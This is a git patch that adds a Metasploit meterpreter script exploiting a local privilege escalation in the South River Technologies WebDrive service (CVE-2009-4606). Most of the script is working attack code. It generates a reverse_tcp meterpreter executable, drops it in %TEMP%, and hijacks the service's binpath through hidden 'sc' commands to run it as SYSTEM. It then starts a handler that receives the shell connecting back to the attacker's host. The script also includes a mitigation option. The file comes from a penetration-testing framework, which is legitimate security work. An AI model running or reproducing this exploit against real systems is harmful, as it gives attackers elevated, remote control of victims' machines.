From 6f53dad3169e3fc9117c47471812d21e1c004151 Mon Sep 17 00:00:00 2001 From: Joshua Drake Date: Thu, 28 Jan 2010 19:00:36 +0000 Subject: [PATCH] add priv escalation meterpreter script for SRT WebDrive bug git-svn-id: file:///home/svn/framework3/trunk@8301 4d416f70-5f16-0410-b530-b9f4589650da --- scripts/meterpreter/srt_webdrive_priv.rb | 121 +++++++++++++++++++++++ 1 file changed, 121 insertions(+) create mode 100644 scripts/meterpreter/srt_webdrive_priv.rb diff --git a/scripts/meterpreter/srt_webdrive_priv.rb b/scripts/meterpreter/srt_webdrive_priv.rb new file mode 100644 index 0000000000..f4105f65e8 --- /dev/null +++ b/scripts/meterpreter/srt_webdrive_priv.rb @@ -0,0 +1,121 @@ +# $Id$ + +## +# South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation. +# +# This module exploits a privilege escalation vulnerability in South River Technologies WebDrive. +# Due to an empty security descriptor, a local attacker can gain elevated privileges. +# Tested on South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3. +# Vulnerability mitigation featured. +# +# Credit: +# - Discovery - Nine:Situations:Group::bellick +# - Meterpreter script - Trancer +# +# References: +# - http://retrogod.altervista.org/9sg_south_river_priv.html +# - http://www.rec-sec.com/2010/01/26/srt-webdrive-privilege-escalation/ +# - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-4606 +# - http://osvdb.org/show/osvdb/59080 +# +# mtrancer[@]gmail.com +# http://www.rec-sec.com +## + +# +# Options +# +opts = Rex::Parser::Arguments.new( + "-h" => [ false, "This help menu"], + "-m" => [ false, "Mitigate"], + "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"], + "-p" => [ true, "The port on the remote host where Metasploit is listening"] +) + +# +# Default parameters +# + +rhost = Rex::Socket.source_address("1.2.3.4") +rport = 4444 +sname = 'WebDriveService' +pname = 'wdService.exe' + +# +# Option parsing +# +opts.parse(args) do |opt, idx, val| + case opt + when "-h" + print_status("South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.") + print_line(opts.usage) + raise Rex::Script::Completed + when "-m" + client.sys.process.get_processes().each do |m| + if ( m['name'] == pname ) + print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.") + + # Set correct service security descriptor to mitigate the vulnerability + print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.") + client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)", nil, {'Hidden' => 'true'}) + end + end + raise Rex::Script::Completed + when "-r" + rhost = val + when "-p" + rport = val.to_i + end +end + +client.sys.process.get_processes().each do |m| + if ( m['name'] == pname ) + + print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.") + + # Build out the exe payload. + pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp") + pay.datastore['LHOST'] = rhost + pay.datastore['LPORT'] = rport + raw = pay.generate + + exe = Msf::Util::EXE.to_win32pe(client.framework, raw) + + # Place our newly created exe in %TEMP% + tempdir = client.fs.file.expand_path("%TEMP%") + tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" + print_status("Sending EXE payload '#{tempexe}'.") + fd = client.fs.file.new(tempexe, "wb") + fd.write(exe) + fd.close + + # Stop the vulnerable service + print_status("Stopping service \"#{sname}\"...") + client.sys.process.execute("cmd.exe /c sc stop \"#{sname}\" ", nil, {'Hidden' => 'true'}) + + # Set exe payload as service binpath + print_status("Setting \"#{sname}\" to #{tempexe}...") + client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= #{tempexe}", nil, {'Hidden' => 'true'}) + sleep(1) + + # Restart the service + print_status("Restarting the \"#{sname}\" service...") + client.sys.process.execute("cmd.exe /c sc start \"#{sname}\" ", nil, {'Hidden' => 'true'}) + + # Our handler to recieve the callback. + handler = client.framework.exploits.create("multi/handler") + handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp" + handler.datastore['LHOST'] = rhost + handler.datastore['LPORT'] = rport + handler.datastore['ExitOnSession'] = false + + handler.exploit_simple( + 'Payload' => handler.datastore['PAYLOAD'], + 'RunAsJob' => true + ) + + # Set service binpath back to normal + client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= %ProgramFiles%\\WebDrive\\#{pname}", nil, {'Hidden' => 'true'}) + + end +end